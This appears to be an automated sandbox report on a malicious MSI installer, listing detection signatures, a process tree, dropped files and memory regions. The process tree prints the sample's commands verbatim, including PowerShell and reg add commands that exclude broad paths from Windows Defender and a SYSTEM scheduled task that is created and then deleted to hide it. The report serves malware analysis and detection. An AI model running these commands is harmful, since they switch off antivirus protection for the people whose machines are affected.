Analysis

  • max time kernel
    150s
  • max time network
    145s
  • platform
    windows11-ltsc_2024_x64
  • resource
    win11ltsc2024-20260709-en
  • resource tags

    arch:x64arch:x86image:win11ltsc2024-20260709-enlocale:en-usos:windows11-ltsc_2024-x64systemwindows
  • submitted
    04/08/2026, 14:38

General

  • Target
    setup_n0c006.msi
  • Size 9.4MB
  • Sample260804-rz2t9scd49
  • SHA256 e27c7b8a6ef18fbda4537009995f5d2bed78507c6d4ee8e2f9c418b67853c1ab
  • MD5 SHA1 SHA512 SSDEEP TLSH

Malware Config

Signatures

  • Windows security bypass 2 TTPs 8 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Badlisted process makes network request 4 IoCs

    Network request originating from process or tool commonly abused by malware.

  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: Clear Persistence 1 TTPs 5 IoCs

    Clear artifacts associated with previously established persistence like scheduletasks on a host.

  • Drops file in System32 directory 9 IoCs
  • Drops file in Windows directory 13 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
  • Executes a command shell one-liner 1 TTPs 4 IoCs

    Execution of a cmd.exe one-liner (/c "close" or /k "keep") is a common script/loader stage.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 9 IoCs
  • Modifies registry class 22 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\setup_n0c006.msi
    1⤵
    • Enumerates connected drives
    • Event Triggered Execution: Installer Packages
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    PID:5948
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2576
    • C:\Windows\system32\srtasks.exe
      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2620
    • C:\Windows\System32\MsiExec.exe
      C:\Windows\System32\MsiExec.exe -Embedding F3E271E862EECA6533513666921FF9E1 E Global\MSI0000
      2⤵
      • Loads dropped DLL
      • Badlisted process makes network request
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of SetWindowsHookEx
      PID:1260
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious use of AdjustPrivilegeToken
    PID:4948
  • C:\Users\Public\abNAJC\JadH9p.exe
    "C:\Users\Public\abNAJC\JadH9p.exe"
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Adds Run key to start application
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:5892
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\ProgramData','C:\Users','C:\Program Files (x86)','C:\' -Force
      2⤵
      • Command and Scripting Interpreter: PowerShell
      PID:5924
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\abNAJC\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
      2⤵
      • Indicator Removal: Clear Persistence
      • Suspicious use of WriteProcessMemory
      PID:5780
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\abNAJC\" /t REG_DWORD /d 0 /f"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:5320
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Run /TN "Task1"
        3⤵
          PID:4576
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Delete /TN "Task1" /F
          3⤵
            PID:4524
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
          2⤵
          • Indicator Removal: Clear Persistence
          • Suspicious use of WriteProcessMemory
          PID:1572
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
            3⤵
            • Scheduled Task/Job: Scheduled Task
            PID:4108
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Run /TN "Task1"
            3⤵
              PID:4088
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Delete /TN "Task1" /F
              3⤵
                PID:5296
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
              2⤵
              • Indicator Removal: Clear Persistence
              • Suspicious use of WriteProcessMemory
              PID:4848
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                3⤵
                • Scheduled Task/Job: Scheduled Task
                PID:1900
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Run /TN "Task1"
                3⤵
                  PID:1952
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Delete /TN "Task1" /F
                  3⤵
                    PID:5712
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                  2⤵
                  • Indicator Removal: Clear Persistence
                  • Suspicious use of WriteProcessMemory
                  PID:3468
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                    3⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:4952
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Run /TN "Task1"
                    3⤵
                      PID:5688
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Delete /TN "Task1" /F
                      3⤵
                        PID:5264
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                      2⤵
                      • Indicator Removal: Clear Persistence
                      • Suspicious use of WriteProcessMemory
                      PID:2908
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Admin\Documents\" /t REG_DWORD /d 0 /f"
                        3⤵
                        • Scheduled Task/Job: Scheduled Task
                        PID:5836
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Run /TN "Task1"
                        3⤵
                          PID:4944
                        • C:\Windows\system32\schtasks.exe
                          SCHTASKS /Delete /TN "Task1" /F
                          3⤵
                            PID:4596
                      • C:\Windows\system32\cmd.exe
                        "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                        1⤵
                        • Executes a command shell one-liner
                        • Suspicious use of WriteProcessMemory
                        PID:936
                        • C:\Windows\System32\reg.exe
                          reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                          2⤵
                          • Windows security bypass
                          PID:3656
                      • C:\Windows\system32\cmd.exe
                        cmd.exe
                        1⤵
                          PID:6080
                        • C:\Windows\system32\cmd.exe
                          "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                          1⤵
                          • Executes a command shell one-liner
                          • Suspicious use of WriteProcessMemory
                          PID:5144
                          • C:\Windows\System32\reg.exe
                            reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                            2⤵
                            • Windows security bypass
                            PID:2072
                        • C:\Windows\system32\cmd.exe
                          "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                          1⤵
                          • Executes a command shell one-liner
                          • Suspicious use of WriteProcessMemory
                          PID:2560
                          • C:\Windows\System32\reg.exe
                            reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                            2⤵
                            • Windows security bypass
                            PID:1612
                        • C:\Windows\system32\cmd.exe
                          "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                          1⤵
                          • Executes a command shell one-liner
                          • Suspicious use of WriteProcessMemory
                          PID:5512
                          • C:\Windows\System32\reg.exe
                            reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                            2⤵
                            • Windows security bypass
                            PID:4504

                        Network

                              MITRE ATT&CK Enterprise v16

                              Replay Monitor

                              Loading Replay Monitor...

                              Downloads

                              e59ebbf.rbs

                              • Path C:\Config.Msi\e59ebbf.rbs
                              • Size 7KB
                              • SHA256 d5cfa412578a0292925a1cd5f4fe853ed3e2e783fac9dceb69e70c9d0c64b121
                              • MD5 SHA1 SHA512 SSDEEP TLSH

                              JadH9p.exe

                              • Path C:\Users\Public\abNAJC\JadH9p.exe
                              • Size 135KB
                              • SHA256 676a2a7b94ca2f8ec76352ee656e4d075bb342bd7ad6efbc7c19c060001eace7
                              • MD5 SHA1 SHA512 SSDEEP TLSH

                              UxEnhance64.dll

                              • Path C:\Users\Public\abNAJC\UxEnhance64.dll
                              • Size 3.1MB
                              • SHA256 6ea236fccd5a02bbbc0a12b8d76f30a975acbc6bb5785753082fb2f15e555b04
                              • MD5 SHA1 SHA512 SSDEEP TLSH

                              adoresd.dat

                              • Path C:\Users\Public\abNAJC\adoresd.dat
                              • Size 4.7MB
                              • SHA256 c9e3f7b81bb59bc0dee5e143e26db2eecd113df5112f16ba1f1b36554206f03c
                              • MD5 SHA1 SHA512 SSDEEP TLSH

                              msadox.tb

                              • Path C:\Users\Public\abNAJC\msadox.tb
                              • Size 8KB
                              • SHA256 27727e6ab68ea92b07ab3314e3577fad822429ec0b466dd5d4c90db1d8229c19
                              • MD5 SHA1 SHA512 SSDEEP TLSH

                              MSIF515.tmp

                              • Path C:\Windows\Installer\MSIF515.tmp
                              • Size 9.3MB
                              • SHA256 f0aca8c83fe144888e46c1e0edd4565b6d75034aa401cdccb30ad895966ff451
                              • MD5 SHA1 SHA512 SSDEEP TLSH

                              e59ebbe.msi

                              • Path C:\Windows\Installer\e59ebbe.msi
                              • Size 9.4MB
                              • SHA256 e27c7b8a6ef18fbda4537009995f5d2bed78507c6d4ee8e2f9c418b67853c1ab
                              • MD5 SHA1 SHA512 SSDEEP TLSH

                              metadata-2

                              • Path \??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2
                              • Size 26.1MB
                              • SHA256 16fe2d9e039b0ccc15072a7cc4e2fbd696468d63a7d76bc6e8bfef1940d755fe
                              • MD5 SHA1 SHA512 SSDEEP TLSH

                              {e334d364-9ce7-45c3-aacd-2cc5547bff3f}_OnDiskSnapshotProp

                              • Path \??\Volume{ca73a981-0000-0000-0000-d08302000000}\System Volume Information\SPP\OnlineMetadataCache\{e334d364-9ce7-45c3-aacd-2cc5547bff3f}_OnDiskSnapshotProp
                              • Size 6KB
                              • SHA256 cd50bc14490c2055511e60f0b7b0e9dcf86d3d3dd862014ddb3cf41a058b148d
                              • MD5 SHA1 SHA512 SSDEEP TLSH

                              memory/1260-16-0x00007FFCE1830000-0x00007FFCE1842000-memory.dmp

                              memory/1260-45-0x00007FFCE1830000-0x00007FFCE1842000-memory.dmp

                              memory/1260-13-0x00007FFCCCC50000-0x00007FFCCD287000-memory.dmp

                              memory/1260-12-0x00007FFCF1670000-0x00007FFCF1672000-memory.dmp

                              memory/5892-67-0x00007FFCF1680000-0x00007FFCF1682000-memory.dmp

                              memory/5892-85-0x0000017B1B360000-0x0000017B1B3AE000-memory.dmp

                              memory/5892-65-0x0000017B1D690000-0x0000017B1DF21000-memory.dmp

                              memory/5892-59-0x00007FFCF1670000-0x00007FFCF1672000-memory.dmp

                              memory/5892-68-0x0000017B1D690000-0x0000017B1DF21000-memory.dmp

                              memory/5892-72-0x0000017B1D690000-0x0000017B1DF21000-memory.dmp

                              memory/5892-73-0x0000017B1D690000-0x0000017B1DF21000-memory.dmp

                              memory/5892-75-0x0000017B1D690000-0x0000017B1DF21000-memory.dmp

                              memory/5892-74-0x0000017B1D690000-0x0000017B1DF21000-memory.dmp

                              memory/5892-79-0x0000017B1D690000-0x0000017B1DF21000-memory.dmp

                              memory/5892-86-0x0000017B1DF30000-0x0000017B1DFBA000-memory.dmp

                              memory/5892-60-0x00007FFCCE750000-0x00007FFCCEC6E000-memory.dmp

                              memory/5892-89-0x0000017B1DF30000-0x0000017B1DFBA000-memory.dmp

                              memory/5892-88-0x0000017B1DF30000-0x0000017B1DFBA000-memory.dmp

                              memory/5892-87-0x0000017B1DF30000-0x0000017B1DFBA000-memory.dmp

                              memory/5892-93-0x0000017B1D690000-0x0000017B1DF21000-memory.dmp

                              memory/5892-95-0x0000017B1D690000-0x0000017B1DF21000-memory.dmp

                              memory/5892-96-0x0000017B1D690000-0x0000017B1DF21000-memory.dmp

                              memory/5924-101-0x000001EB7A000000-0x000001EB7A022000-memory.dmp

                              memory/5924-105-0x000001EB7A050000-0x000001EB7A06E000-memory.dmp

                              memory/5924-106-0x000001EB7A070000-0x000001EB7A122000-memory.dmp

                              memory/5924-107-0x000001EB7A130000-0x000001EB7A13A000-memory.dmp